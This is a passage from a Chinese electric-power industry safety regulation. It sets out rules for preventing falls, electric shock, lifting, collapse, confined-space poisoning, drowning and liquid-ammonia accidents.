安全带,安全带上应挂有安全绳,安全绳另一端必须握在仓或斗外的监护人手中, 且牢固地连接到外部固定物体上。 1.1.16 从事风电机组塔筒清洗、叶片维修等高处作业,必须在风机停机状态 并将叶轮锁定、做好防止吊篮摆动等措施后进行,作业人员必须使用独立安全绳、 防坠器,安全绳应避免接触边缘锋利的构件,严禁对安全绳接长使用。工作地点 20m 直径范围内禁止人员停留和通行。 1.1.17 拆除工程必须事先制定安全防护措施和作业程序,并对作业人员进行 安全技术交底;作业人员必须在安全措施落实到位后,按照拆除程序进行作业, 不得颠倒、漏项。 1.2 防止触电事故 1.2.1 凡从事电气操作、电气检修和维护的人员(统称电气作业人员)必须 经专业技术培训、触电急救培训并考试合格方可上岗。带电作业人员应经专门安 3 全作业培训,考试合格并经单位批准。 1.2.2 电气作业人员应正确佩戴合格的个人防护用品,使用合格的电力安全 工器具。绝缘鞋(靴)、绝缘手套等必须符合国家或行业相关标准。作业时,应 穿工作服,戴安全帽,穿绝缘鞋(靴),根据作业需要佩戴绝缘手套。 1.2.3 使用绝缘安全工器具——绝缘操作杆、验电器、携带型短路接地线等 必须经过定期试验合格,使用前必须检查安全工器具结构完整、性能良好,在检 验有效期内。 使用的手持电动工器具和电气机具应定期检验合格,使用前应进行检查,并 按工器具类型在使用中佩戴绝缘手套、配备漏电保护器或隔离电源。 1.2.4 电气设备的金属外壳应有良好的接地装置,使用中不得将接地装置拆 除或对其进行任何工作。 1.2.5 检修动力电源箱的支路开关都应加装剩余电流动作保护器(漏电保护 器)并应定期检查和试验。连接电动机械及电动工具的电气回路应单独装设开关 或插座,并装设剩余电流动作保护器,做到“一机一闸一保护”。 对氢站、氨站、油区、危险化学品间、酸性蓄电池室(不含阀控式密封铅酸 蓄电池室)等特殊场所,应选用防爆型检修电源箱,并使用防爆插头。 1.2.6 在高压线路、设备及相关区域工作,根据不同的作业方式、地点,人 体与带电体的安全距离应满足《电力安全工作规程 电力线路部分》(GB26859) 和《电力安全工作规程 发电厂和变电站电气部分》(GB26860)相关要求。低 压电气带电工作时,人体不得直接接触裸露的带电部位并保持对地绝缘。作业中 应采取防相间短路和单相接地措施。 1.2.7 高压线路、设备停电检修时,应采取停电、验电、接地、悬挂标示牌 和装设遮栏(围栏)等措施,作业人员应在接地装置的保护范围内作业。禁止作 业人员擅自移动或拆除接地线、遮栏(围栏)、标示牌。 低压线路、设备停电、验电后,无法实施接地措施时,可采取加锁、挂牌或 绝缘遮蔽等措施,必要时派人看守。 带电作业主要采取等电位、中间电位、地电位三种方式。等电位作业时,作 业人员须穿屏蔽服,与带电部位保持电位相同;中间电位和地电位作业时,作业 人员需借用绝缘工器具对带电部位进行操作。 4 1.2.8 高压电气设备带电部位对地距离不满足设计标准时周边必须装设防护 围栏,门应加锁,并挂好安全警示牌。围栏与带电部位最小间距应满足《电力安 全工作规程 发电厂和变电站电气部分》(GB26860)要求。 1.2.9 雷雨天气,需要巡视室外高压设备时,应穿绝缘靴,并不准靠近避雷 器和避雷针。 雨天操作室外高压设备时,应使用有防雨罩的绝缘棒,穿绝缘靴、戴绝缘手 套。雷电时禁止就地倒闸操作和登塔作业。发生雷雨天气后一小时内禁止靠近风 力发电机组。 1.2.10 当高压设备发生接地故障时,室内不得进入故障点 4m 以内,室外不 得进入故障点 8m 以内。进入上述范围的人员必须穿绝缘靴,接触设备的外壳和 构架应带绝缘手套。 当发觉有跨步电压时,应立即将双脚并在一起或用一条腿跳着离开接地故障 点。 1.2.11 高压试验时,必须装设围栏,悬挂安全标示牌,并设专人看护,严禁 其他人员进入试验场地或接触被试验设备。试验设备两端不在同一地点时,另一 端也应采取防范措施,并指派专人看守。试验时,操作人员应站在绝缘物上。禁 止越过遮栏(围栏)。 1.2.12 因邻近带电设备或工作地段有邻近、平行、交叉跨越及同杆塔架设带 电线路,导致检修设备(线路)可能产生感应电压时,应加装工作接地线或使用 个人保安线。 架空绝缘导线不得视为绝缘设备,在停电检修作业中,开断或接入绝缘导线 前,应做好防感应电的安全措施。 1.2.13 电缆及电容器检修前应逐相充分放电,并可靠接地;试验后的电缆及 电容器应充分放电。 1.2.14 在地下敷设电缆附近开挖土方时,严禁使用机械开挖。 1.2.15 严禁用湿手去触摸电源开关以及其它电气设备。 1.2.16 在变电站户外和高压室内搬动梯子、管子等长物,应放倒后搬运,并 与带电部分保持足够的安全距离。在变、配电站带电区域内或临近带电线路处, 禁止使用金属梯子。 5 1.2.17 在带电设备周围或上方进行安装或测量时,严禁使用钢卷尺或带有金 属丝的测绳、皮尺,上下传递物件必须使用干燥的绝缘绳索。 1.2.18 有限空间移动照明应使用 36V 以下的电压,金属容器内、潮湿环境 下应使用 12V 的安全电压。 使用超过安全电压的手持电动工具,应按规定配置剩余电流动作保护装置 (漏电保护器)。 1.2.19 严禁无票操作、擅自修改操作票、擅自解除高压电气设备的防误操作 闭锁装置,严禁带接地线(接地刀闸)合断路器(隔离开关),严禁带电挂(合) 接地线(接地刀闸)和带负荷拉(合)隔离开关,严禁误入带电间隔。 1.2.20 3~66kV 中性点不接地系统发生单相接地故障时,一次设备应能快速 切除故障,从而降低人身触电风险。变电站 3~66kV 各段母线,因地制宜配置主 动干预型消弧装置。 1.3 防止物体打击事故 1.3.1 进入生产现场人员必须掌握相关安全防护知识,正确佩戴合格的安全 帽。工作场所井、坑、孔、洞或沟道、缝隙等,应覆以与地面齐平的坚固盖板, 作业平台临边必须装设踢脚板。建构筑物或设备设施上搁置物、悬挂物必须采取 防止脱落、掉落措施。 1.3.2 高处临边原则上不得堆、放物件,必须堆放时应采取防止物件掉落措 施。在格栅式平台上堆、放小型物件时,应铺设木板或胶皮等,采取确保物件不 掉落的措施。 高处场所的废弃物应及时清理,清理前应做好防止物件掉落的措施。 1.3.3 高处作业时,必须做好防止物件掉落的防护措施,严禁两名及以上作 业人员同时攀爬直梯;使用工具袋时,应拴紧系牢;上下传递物件时,应用绳子 系牢物件后再传递,严禁上下抛掷物品。 上、下层垂直交叉同时作业时,中间必须搭设严密牢固的防护隔板、罩栅或 其它隔离设施。无专项施工方案和现场安全措施未落实,禁止立体交叉作业。 高处作业地点的下方应用围栏设置隔离区,人员进出通道口和通行道路上部 应设置安全防护棚;无法设置隔离区的应设警戒区,应设专人监护,人员不得在 工作地点下面通行和逗留。 6 1.3.4 从事手工加工的作业人员,必须掌握工器具的正确使用方法及安全防 护知识,作业前应检查工器具安装牢固。 从事人工搬运的作业人员,必须掌握撬杠、滚杠、跳板等工具的正确使用方 法及安全防护知识,必须戴好安全帽,防护手套,穿好防砸鞋,必要时戴好披肩、 垫肩、护目镜。 1.3.5 进入锅炉炉膛、尾部烟道、脱硫吸收塔、电除尘等设备内部进行工作 前,应先清除上方可能掉落的焦、渣,并做好防止工作时上方落物的安全措施。 1.3.6 风力发电机组叶片有结冰现象且有掉落危险时,禁止人员靠近。登风 机前,应确定无高处落物风险。禁止两人同时攀爬。随手携带工具人员应后上塔、 先下塔。 1.4 防止机械伤害事故 1.4.1 机械(设备)的操作人员必须经过专业技能培训,并掌握现场操作规 程和安全防护知识。 操作人员着装不应有可能被转动机械绞住的部分,必须穿好工作服,衣服、 袖口应扣好、扎紧,不得戴围巾、领带,长发必须盘在帽内。 使用机床时,必须戴防护眼镜,不得戴手套。不得在运转设备的旋转和移动 部分旁边换衣服。 1.4.2 机械设备各转动、传动部位(如传送带、齿轮机、联轴器、飞轮等) 必须装设防护装置。 机械设备必须装设紧急制动装置,“一机一闸一保护”。周边必须划警戒线, 照明必须充足。 工作场所应设人行通道,设备移动或转动时与构筑物或固定物体之间安全距 离不符合要求的区域,应用固定式安全网封闭隔离,限制人员通行。 1.4.3 在停运检修的机械设备上工作,应切断电源、风源、水源、汽(气) 源、油源等,必须采取强制制动措施,防止设备突然转动。 1.4.4 严禁清扫、擦拭和润滑运行设备中的旋转和移动部分,严禁将头、手、 脚伸入部件活动区内。 1.4.5 输煤皮带的转动部分及拉紧重锤必须装设遮栏,加油装置应接在遮拦 外面。输煤皮带两侧人行通道必须装设固定防护栏杆和标识明显的紧急停止拉线 7 开关。 1.4.6 在输煤皮带运行、备用过程中,严禁清理皮带和设备中杂物。在防止 输煤皮带启动安全措施实施前,输煤皮带上严禁站人,严禁跨越和爬过输煤皮带, 严禁在输煤皮带上传递各种用具。 1.4.7 给料(煤)机在运行中发生卡、堵时,应停止设备运行,做好设备防 转动措施后方可清理塞物,严禁用手直接清理塞物。 钢球磨煤机运行中,严禁在传动装置和滚筒下部清除煤粉、钢球、杂物等。 1.4.8 空气预热器内进行检修工作前,内外部人员信息必须保持通畅并做好 相应的安全措施;回转式空气预热器盘车时,内部人员应撤离至安全位置;盘车 用的工具应封闭存放,由专人保管。 1.5 防止灼烫伤害事故 1.5.1 电工、电(气)焊人员均属于特种作业人员,必须经专业技能培训, 取得《特种作业操作证》。电工作业、焊接与热切割作业、除灰(焦)人员、热 力作业人员必须经专业技术培训,符合上岗要求。 电(气)焊作业面应铺设防火隔离毯并做好防焊渣、焊花飞溅的措施,作业 区下方设置警戒线并设专人看护,作业现场照明充足。 1.5.2 作业人员应避免靠近或长时间地停留在可能受到灼烫危及人身安全的 地方。 进行接触高温物体的工作,必须穿好防烫伤的隔热劳动防护用品。电(气) 焊作业人员必须穿好焊工工作服、焊工防护鞋,戴好工作帽、焊工手套,其中电 焊须戴好焊工面罩,气焊须戴好防护眼镜。化学作业人员(配置化学溶液,装卸 酸(碱)等)必须穿好耐酸(碱)服,戴好橡胶耐酸(碱)手套和防护眼镜(面 罩)。 1.5.3 在维护和检修热力系统的阀门、管件、设备时,必须采取防止汽水串 通的可靠隔离措施。 严禁在热力系统消压、放水前作业,严禁近距离检查带压状态设备、管道的 泄漏,严禁用敲打法检查管道的泄漏,严禁带压堵漏。 1.5.4 除焦作业人员必须穿好防烫伤的隔热工作服、工作鞋,戴好防烫伤手 套、防护面罩和必须的安全工具,站在除焦口的侧面。 8 除焦时,原则应停炉进行。确需不停炉除焦(渣)时,应设置警戒区域,挂 上安全警示牌,设专人监护,非除焦人员禁止进入除焦作业区;必须做好确保锅 炉稳定燃烧的措施,当燃烧不稳定或有炉烟向外喷出时,禁止打焦。 循环流化床锅炉除焦,必须停炉处理,指定专门的现场指挥人员,开工前必 须制定好除焦方案,并进行安全和技术交底。 1.5.5 捞渣机周边应装设固定防护栏杆,设置“当心烫伤”警示牌,禁止人员 在运行中的捞渣机周围长时间停留。 不停炉在捞渣机区域进行检修作业时,作业人员必须穿好防烫伤的隔热工作 服、戴头盔等,应采取降低机组负荷、关闭锅炉冷灰斗关断门并设置支撑等防止 大焦块掉落,渣飞溅伤人措施。 循环流化床锅炉的外置床事故排渣口周围必须设置固定围栏。循环流化床排 渣门须使用先进、可远操作的电动锤型阀,取消简易的插板门。 1.5.6 制粉系统防爆门应装有阻火装置,不应正对人行道。对给粉机、给煤 机、磨煤机入口管道、制粉系统设备内部进行清理煤(粉)前,应确保煤粉无自 燃,入口门(挡板)关闭。 1.5.7 锅炉运行时,因工作需要打开的门孔应及时关闭。人员不得在锅炉人 孔门、炉膛连接的膨胀节处长时间逗留。 观察炉膛燃烧情况时,必须站在看火孔的侧面;同时佩戴防护眼镜或用有色 玻璃遮盖眼睛。 1.6 防止起重伤害事故 1.6.1 属于特种设备的起重机械必须按照国家相关规定周期进行检验,并在 特种设备安全监督管理部门登记备案,应定期检查并作好记录。 1.6.2 起重吊具(钢丝绳、钢丝绳卡、吊带、吊钩、卸扣等)由使用单位每 月检查 1 次、每年自检 1 次;手拉葫芦(倒链)、电葫芦、卷扬机由使用单位每 年自检 1 次。 1.6.3 从事起吊作业及其安装维修的人员必须取得相应证书,并经县级以上 医疗机构体检合格方可上岗。持证人员应按照证书上的作业类别和准操项目,操 作相应的起重机械。 1.6.4 起重作业人员必须穿工作服和安全鞋(靴),佩戴安全帽;起重指挥 9 人员必须佩戴明显标志,配备必要的通讯设备,不得兼做司索(挂钩)及其他工 作,严禁多人指挥;起重司机必须听从指挥人员的指挥,指挥信号不明时严禁操 作;吊装中任何人发出紧急停车信号时,司机必须立即停车。 1.6.5 大型起重作业、易燃易爆物品吊装及危险化学品的吊装作业必须制订 “三措两案”(即组织措施、技术措施、安全措施、施工方案、应急预案),经本 单位审批执行,并设置专业人员监护。吊装易燃易爆物(如氧气瓶、煤气罐等)、 危险化学品时,由专业人员负责吊物的安全性,指挥人员负责吊装的安全性。 1.6.6 起吊现场必须保证光线和视线良好、照明充足,设置警戒区域并设专 人监护,非工作人员严禁入内。 1.6.7 吊装散件物时应用料斗或箱子,装料高度严禁超过上口边,散粒状的 物料必须低于料斗上口边线 100mm;吊装大的或不规则的物件时,应在物件上 系上控制其姿态和方向的拉绳。 1.6.8 起重吊物前,必须清楚吊物重量并捆绑牢固,严禁起吊不明物和埋在 地下的物件。当吊物无固定吊点时必须按规定选择吊点,使吊物在吊运中保持平 衡和吊点不发生移动。带棱角或缺口的吊物无防割措施严禁起吊。 1.6.9 吊装前,必须检查起重机械的安全装置可靠、起重工具检验合格并在 有效期内、吊具、钢丝绳等完好无损,确认吊点承载能力、吊物重量、捆绑正确 牢固、吊装区域内无人、吊运路线无障碍物、与电气设备距离符合安全要求。 1.6.10 起吊前必须鸣铃(或口哨)示警,吊装接近人时应给断续铃声(或口 哨)示警。当起吊物离地 20~30cm 时必须停吊检查,确认安全性;吊装中的吊 物不得长期悬在空中;吊物暂时悬在空中时,司机不得离开驾驶室或做其他工作; 吊装中突遇停电,应先将控制器恢复到零位,切断电源,然后采用防止吊物坠落 的可靠措施将吊物缓慢放下。 1.6.11 吊装作业,严禁利用管道、设备、防护栏杆、脚手架以及不坚固的建 (构)筑物上作为起吊物的吊点,严禁超载或歪斜拽吊,严禁在吊物上站人或放 有活动物件,严禁起重人员停留在吊物下作业,严禁吊物从人的头上越过或停留, 严禁人员从吊物下方行走或停留。 1.6.12 利用两台或多台起重机械吊装同一重物时,绑扎时应根据各台起重机 械的允许起重量按比例分配负荷,保持吊装同步,每台起重机械的起重量不得超 10 过其额定起吊重量的 80%。 1.6.13 翻转吊物时,起重人员必须站在吊物翻转方向反侧来翻转吊物;放置 吊物必须平稳牢固,并做好防倾倒、滑动和滚动措施;抽出吊物绑绳时,不得斜 拉、强拉或旋转吊物等。 1.6.14 在电气设备附近或高压线下起吊物体,必须履行审批手续,起重机械 必须使用不小于 16mm2 的软铜线可靠接地,且与电气设备或高压线保持安全距 离,制订好防范措施,并设电气监护人监护。 1.6.15 大雪、大雨、雷电、大雾、风力 6 级及以上等恶劣天气严禁户外起重 作业。 1.7 防止坍塌伤害事故 1.7.1 堆放物料前必须检查确认堆放物处的地面平整、平台牢固且承载能力 满足要求;堆放物料时应自下而上逐层进行,取物料时与此相反。严禁超高堆放 物料,严禁中间抽取物料,严禁倚靠堆置物,严禁在堆置物旁逗留、工作或休息。 1.7.2 开挖土石方(基坑)前,必须勘察确认施工场地的地质、水文和地下 管网布置等情况,基坑四周和坑底四周应设置排水措施,对大型基坑、井坑等必 须有经专家审定的施工方案。严禁掏根开挖和反坡开挖,严禁在石土滑落方向撬 挖,严禁上下层同时开挖,严禁在基坑或边坡下休息。开挖过程中,若发现有可 能坍塌或滑动裂缝时,作业人员必须立即撤离危险区域,待险情处理或采取可靠 的防护措施后再恢复作业。 1.7.3 人工开挖基坑要有支护方案,基坑深度不足 2m 时,原则上不再进行 支护但要放坡;基坑深度超过 2m 小于 5m 应按表 1-1 规定对基坑放坡;基坑深 度超过 5m 且不具备放坡条件时,要有专项支护设计。严禁开挖已支护基坑的下 层土石方;严禁在支护结构上放置或悬挂重物。 表 1-1 各类土质的坡度 土质类别 砂土、砾土、淤泥 砂质粘土 粘土、黄土 硬粘土 坡度(深、宽) 1:0.75 1:0.5 1:0.3 1:0.15 1.7.4 煤场汽车接卸煤指挥人员必须远离煤车指挥,严禁站在汽车上煤堆行 驶方向指挥。用推煤机压实整形煤堆时,应注意煤堆坡度和煤堆坍塌的风险,应 注意与煤堆边缘保持一定安全距离。 11 1.7.5 加强对存在可能垮塌风险的场所(如尾部烟道、料仓、粉仓、灰斗等) 的定期巡检和管理工作,保证料位计指示正确,严禁长期高料位运行。若发现有 漏灰、灰斗脱落等异常情况时应及时采取防护措施后进行处理,周围应悬挂警示 牌,严禁人员在附近逗留和通过。 1.7.6 搭设脚手架必须使用合格的管件、脚手板、扣件等材料,搭设好后必 须验收合格、悬挂验收合格牌;每次使用前必须检查确认架体连接稳固、安全可 靠、承载能力;使用时,严禁擅自改变架体结构,严禁超载使用,严禁在脚手架 上起重作业,严禁将任何管道、起重装置等与架体结构连接;拆除脚手架时,必 须由上而下逐层拆除,连墙件必须随脚手架逐层拆除,严禁数层同时拆除,严禁 将整个脚手架推倒拆除。 1.7.7 模板工程施工,严禁擅自改变施工方案或凭经验施工,搭设模板必须 选用合格的搭设材料,浇筑混凝土必须办理混凝土浇筑许可手续,浇筑时必须按 照“先浇筑柱、再浇筑梁和板”工序进行;拆除模板必须办理申请拆模手续,且确 认混凝土达到拆模强度后方可拆除,拆除模板时必须按照“先拆侧模后拆底模, 先拆非承重部分后拆承重部分”的原则进行,严禁随意拆模。 1.7.8 搭设临时建筑必须制订施工方案,选择安全地段和合格建材,必须验 收合格后方可使用。严禁使用钢管、毛竹、三合板、石棉瓦等搭设,严禁使用夹 芯板作为活动房的竖向承重构件,严禁在易发生泥石流、季节旋风、山洪、微地 形大风处搭设,严禁在临时建筑墙外周边开挖土石方。 1.7.9 拆除工程应制订施工方案,并遵守“先上后下、先屋面后主体、先水电 后建筑、先梁板后墙柱、先内墙后外墙”原则;拆除前必须现场研究拟拆除物整 体结构、确定拆除顺序,按照拆除顺序施工,对局部拆除影响结构安全的必须先 加固后拆除。严禁随意拆除或立体交叉拆除作业。 1.8 防止中毒窒息事故 1.8.1 进入有限空间必须佩戴合格的防护用品和应急装备;进入可能会持续 释放有毒有害气体或作业可能产生有毒有害气体的场所,必须佩戴长管呼吸器或 正压空气呼吸器;进入有害气体的场所必须佩戴防毒面罩;进入酸气较大的场所 必须佩戴套头式防毒面具;进入液氨泄漏的场所必须穿好重型防化服并佩戴正压 式空气呼吸器。 12 1.8.2 有限空间作业必须遵守“先通风、再检测、后作业”原则,对隧洞作业 或者有害因素可能发生变化的作业,还必须做到“持续通风、持续检测”原则。必 须执行有限空间作业审批许可制度、有限空间出入登记制度,必须设专人监护。 1.8.3 有限空间作业必须对其危险有害因素进行辨识,进入前 30min 内必须 检测有害气体浓度不得超过表 1-2 限值,氧气浓度在 19.5%~21.0%范围内,并保 持良好通风;作业中至少每 2h 检测一次有害气体含量,对可能释放有害物质的 有限空间应连续监测;作业中断时间超过 30min 必须重新检测。 表 1-2 有限空间作业常见有毒气体浓度判定限值 评判值 气体名称 mg/m 3 ppm(20℃) 硫化氢 10 7 氯化氢 7.5 4.9 氰化氢 1 0.8 磷化氢 0.3 0.2 溴化氢 10 2.9 氯 1 0.3 甲醛 0.5 0.4 一氧化碳 30 25 一氧化氮 10 8 二氧化碳 18000 9834 二氧化氮 10 5.2 二氧化硫 10 3.7 二硫化碳 10 3.1 苯 10 3 甲苯 100 26 二甲苯 100 22 氨 30 42 乙酸 20 8 丙酮 450 186 注:标中数据均为该气体容许浓度的上限值。 1.8.4 有限空间仅有 1 个进出口时,必须将通风设备出风口置于作业区域底 部进行送风;有限空间有 2 个或 2 个以上进出口(通风口)时,必须在临近作业 人员处进行送风,远离作业人员处进行排风,且出风口应远离进风口,防止有害 气体循环进入有限空间。 1.8.5 对容器内的有害气体置换时,吹扫必须彻底、不留残留气体,吹扫气 体排放必须符合安全要求,易燃易爆气体必须使用符合要求的惰性气体置换,容 13 器与其他管道的连接处应加装可靠隔离封堵措施。 1.8.6 在有限空间内从事衬胶、涂漆、刷环氧树脂等具有挥发性溶剂作业时, 必须进行强力通风,采取防止爆燃措施。严禁使用纯氧通风。 1.8.7 进入容器、罐、井、仓或池内的作业人员必须遵守 1.1.15、1.8.2、1.8.3、 1.8.5 等条要求外,还必须确保作业人员与外部监护人联络畅通,联络不畅时严 禁作业。严禁在容器、罐、井、仓或池内使用软梯。 1.8.8 在有限空间内作业感觉身体不适时,应立即撤离现场;如发生中毒窒 息事件时,现场监护人应在有限空间外施救,并立即报告。施救人员必须正确选 用并佩戴好合格的防毒用品、呼吸器具,携带救援器材后,方可进入施救。严禁 盲目进入施救。 1.8.9 有限空间内作业结束后,必须清点人员和工具,确认有限空间内无人 后,方可关闭人孔门或盖板并解除采取的隔离封闭措施。 1.8.10 两台锅炉共用一个烟囱,当一台锅炉运行另一台锅炉检修需进入脱硫 吸收塔、净烟道时,净烟气挡板必须关闭严密并切断电源,防止烟气倒入检修系统。 1.8.11 危险化学品专用仓库必须装设机械通风装置、冲洗水源及排水设施, 必须设专人管理,应进行出入库登记。从事危险化学品的人员必须熟悉所用药品 的毒性、腐蚀、爆炸、燃烧等特性,掌握操作要点及安全注意事项,掌握现场急 救方法和程序。 1.8.12 化学实验室必须装设通风、自来水、消防设施,应在明显处放置急救 药箱、酸(碱)伤害急救中和用药、毛巾、肥皂等。从事化验人员必须穿专用工 作服并做好安全防护。 1.8.13 盛装化学药品和溶剂的容器必须标识正确,严禁容器上无标签。剧毒 危化品必须储藏在隔离房间或保险柜内,保险柜应装设双锁,并双人、双账管理, 装设电子监控设备,并挂“当心中毒”警示牌。 1.8.14 进入尿素溶解罐前,必须将罐内浆液全部清空,充分通风,并检测罐 内氨气残存量的气体浓度值不得大于 30mg/m3,方准作业。 1.8.15 配制有毒性、致癌或有挥发性等药品时,室内必须在通风柜橱内进行, 室外必须站在上风口进行。露天装卸化学药品(溶液)时,人必须站在上风口作 业。 14 1.8.16 化学室内作业时,应每隔 1~2h 到室外换气。若感到头痛、恶心、胸 闷、心悸等不适症状,立即停止作业,并到室外换气。 1.8.17 化学实验时,严禁一边作业一边饮食(水);工作中断或结束后,工 作人员必须及时换衣洗手。化学实验用过的有毒有害废弃物严禁随意抛弃,必须 集中保管,妥善处理。 1.9 防止电力生产交通事故 1.9.1 建立和完善电力生产交通安全管理制度和相应的实施细则,健全交通 安全保证和监督体系,明确责任。严禁无证驾驶、酒后驾驶、超速超载、人货混 装等违法违章驾驶行为。 1.9.2 加强对电力生产所用车辆维修管理,确保车辆的技术状况符合国家规 定,安全装置完善可靠。定期对车辆进行检修维护,在行驶前、行驶中、行驶后 对安全装置进行检查,发现危及交通安全问题,应及时处理,严禁带病行驶。 1.9.3 大件运输、大件转场、运输危化品或易燃易爆物品应严格遵守有关法 规,制定运输方案和专门的安全技术措施,指定有经验的专人负责,事前应对参 加工作的全体人员进行全面安全技术交底。危险货物运输驾驶员、装卸员、押运 员应取得相应的从业资格证。 1.9.4 在临边、狭窄场地、临近带电体及线路等危险区域(路段)使用车辆作 业时,应划定明确的作业范围,设置明显的警示标志,并设专人监护。 1.9.5 严禁未提前确认路基、边坡满足安全作业要求盲目作业,悬崖陡坡、 路边临空边缘必须设安全警示标志、安全墩、挡墙等防护设施,并确保夜间有充 足照明。 1.9.6 严禁在铁道上或机车底下休息,不准在车辆下面或两节车的中间穿过。 在铁道附近进行工作可能影响调车作业或行车安全时,工作负责人应事先与调车 人员联系,做好安全措施,必要时应设专人监护。煤车摘钩、挂钩或起动前,必 须由调车人员查明车底下或各节车辆的中间确已无人,才可发令操作。 1.9.7 叉车、翻斗车、起重机、铲车等特种车辆,除驾驶员、副驾驶员座位 以外,任何位置在工作中不得载人。 1.9.8 机动车在无限速标志的厂内主干道行驶时,不得超过 30km/h,其它道 路不得超过 20km/h。机动车行驶特定地点、路段或遇到特殊情况时的限速要求 15 应符合相关规定。 1.9.9 建立交通安全预警机制。按恶劣气候、气象、地质灾害等情况及时启 动预警机制,制定并落实防止车辆伤害事故的管控措施。 1.10 防止电力生产淹溺事故 1.10.1 水上运输应遵守水运管理部门或海事管理机构的有关规定。 机动作业船、运维交通船等作业船只,必须有船舶行驶许可证,必须按要求 配备船员,配备救生设备,船体不得有损伤漏水。 1.10.2 上下船使用的跳板宽度不得小于 250mm,水上临时人行跳板宽度不得 小于 600mm,跳板的强度和刚度应满足使用要求,跳板端部应固定,板面应设 置防滑设施。水上临时人行跳板应设置安全护栏或张挂安全网。 1.10.3 船上装卸大件物体或大型施工设备应有专门的装卸方案,严禁船舶超 载。海上风电建设项目大件运输应制定海上运输方案和应急预案。 1.10.4 进入水轮机(水泵)等内部工作时,必须严密关闭进水闸门(或进水 阀),并切断其动力电源和控制电源,做好隔离水源措施,排除内部积水。工作 结束撤出时必须清点人数。 1.10.5 集水井、集水廊道洞口、生产区域水池等有淹溺危险的场所应设置坚 固的盖板或护网并盖实,防止人员掉落溺水。集水井、集水廊道内的工作,必须 有专人监护,作业人员必须系好安全带和安全绳,安全绳由监护人掌握,遇有水 位上涨时,井内作业人员必须立即撤离。 1.10.6 临水、水上作业应对作业人员进行安全救生培训,必须制定详细的预 控措施并进行现场交底,必须有 2 人以上方可进行。 临水、水上作业及乘坐交通工作船时,人员必须穿好救生衣(或绑安全绳、 安全带)、穿防滑鞋,作业人员在出海前或在船期间不得饮酒,禁止游泳、捞物。 临水作业现场应设置有效的安全防护措施、安全警示牌,夜间作业配备足够 的照明设施,五级及以上大风、大雨、雷电、浓雾天气禁止临水和水上作业。 1.10.7 围堰施工过程中必须监测水位变化,围堰内外的水头差必须在设计范 围内,筑岛围堰必须高出施工期间可能出现的最高水位 0.7m 以上。 1.10.8 基坑、顶管工作井周边必须有良好的排水系统和设施,设置防护盖板 或围栏,夜间必须设置警示灯。 16 1.10.9 严禁穿越深浅不明的水域。对于抗洪抢险作业、台风暴雨持续期间, 故障巡视应至少两人一组进行,巡视期间保持通信畅通。 1.10.10 当大坝溢流或泄洪量达到规定值时,禁止在上、下游大坝近区进行 任何水上作业。 1.10.11 潜水作业应由取得相关资质的人员担任,作业前,必须对装具、设 备和系统进行现场检查和测试,并遵守潜水作业相关安全要求。禁止夜间水下作 业,如遇特殊情况需在夜间作业时,应经本单位批准,并做好相关措施。 1.11 防止烟气脱硫设备及其系统中人身伤亡事故 1.11.1 新建、改建和扩建电厂的吸收塔及内部支撑架、烟道、浆液箱罐、烟 气挡板、浆液管道、烟囱做防腐处理时,应选择耐腐蚀、耐磨损的材料,对浆液 泵及搅拌器、浆液管道(管件)、旋流器、膨胀节要做防磨处理,并加强日常检 查维护,防止由于设备腐蚀、卡涩带来的安全隐患。 1.11.2 防止脱硫塔进口烟气温度过高损坏防腐层。及时修复损坏的防腐层和 更换损坏的衬胶管。 1.11.3 加强石灰石粉输送系统防尘措施,防止粉尘飞扬对作业人员造成职业 健康伤害。在脱硫石膏装载作业时,必须在确认运输车厢(罐)内无人后才能进 行装载作业。 1.11.4 加强浆液池等盛装液体的沟池的安全防护,有淹溺危险的场所必须设 置盖板,并做到盖板严密,以防作业人员落入沟池。 1.11.5 进入脱硫塔前,必须打开人孔门进行通风,在有毒气体浓度降低到允 许值以下才能进入。进入脱硫塔检修,应做好防止作业人员坠落、防落物伤人安 全措施,脱硫塔外必须设专人监护。 1.11.6 加强保安电源的维护,发生全厂停电或者脱硫系统突然停电时,保安 电源能确保及时启动并向脱硫系统供电。 1.12 防止液氨储罐泄漏、中毒、爆炸伤人事故 1.12.1 液氨储罐区应由具有综合甲级资质或者化工、石化专业甲级设计资质 的化工、石化设计单位设计。储罐、管道、阀门、法兰等必须定期检验、检测、 试压,确保质量性能符合要求。 1.12.2 液氨区域应必须设置安全警示标志,现场必须放置防毒面具、防护服、 17 药品等防护用具。 液氨区域必须标识清晰的安全逃生方向和路线,必须设置及时掌握风向变化 的方向标,必须放置符合规定要求的消防灭火器材,必须设置洗眼器、淋洗器和 喷淋系统,必须按要求设置避雷装置和静电释放装置,输送易燃物质的管道、法 兰等应有防静电接地措施。 氨区控制室和配电间出入口不得朝向装置间。氨区所有电气设备、远传仪表、 执行机构、热控盘柜等均选用相应等级的防爆设备,防爆结构选用隔爆型(Ex-d), 防爆等级不低于 IIAT1。 1.12.3 进入液氨储存区,严禁吸烟,严禁携带火种,严禁携带和使用无线通 讯设备,严禁人员未释放静电进入。 1.12.4 应加强液氨区域管理,建立液氨管理制度,加强相关人员的业务知识 培训,液氨作业人员必须经过专门培训,熟悉系统,熟悉液氨物理、化学特性和 危险性,经考试合格,持证上岗。 严格工艺措施,加强巡回检查,防止液氨系统跑冒滴漏,尤其应防止因外部 环境腐蚀发生泄漏。 应制定液氨储罐意外受热或罐体温度过高致使压力显著升高、液氨泄漏等应 急预案,并定期组织演练。 1.12.5 进入液氨储存区域的人员必须正确穿戴劳动防护用品,严禁穿戴易产 生静电服装(严禁穿带钉皮鞋、穿易起静电化纤类服装等)。作业人员实施操作 时,应按规定佩戴个人防护品。 1.12.6 氨区应设置事故报警系统,氨气泄漏检测装置应覆盖氨区,具有检测 数据远传、就地报警功能,并自动联锁启动水喷淋系统。 液氨泄漏时,应立即采取处理措施,在保证安全的情况下,尽可能切断泄漏 源;应急处理人员必须戴正压式空气呼吸器,穿专用防护服;泄漏区周围立即设 置隔离带,并监测空气中氨气的浓度,撤离隔离带内所有人员。 1.12.7 严格控制液氨储罐充装量,不应超过储罐总容积的 85%。严禁过量充 装,防止因超压而发生罐体开裂或阀门顶脱、液氨泄漏伤人。 1.12.8 应在液氨储罐四周安装自动水喷淋装置,当罐体温度过高时该装置自 动启动。氨贮存箱、氨计量箱的排气,应设置氨气吸收装置。 18 1.12.9 在液氨储存区检修时应作好防护措施,严格执行动火审批制度,并加 强监护。氨罐检修时,必须采取防止形成爆炸性混合气体的措施后方可开工。严 禁在充装液氨的罐体上实施动火作业。 1.12.10 液氨槽车卸料时应严格遵守操作规程,卸料过程应有专人监护。完 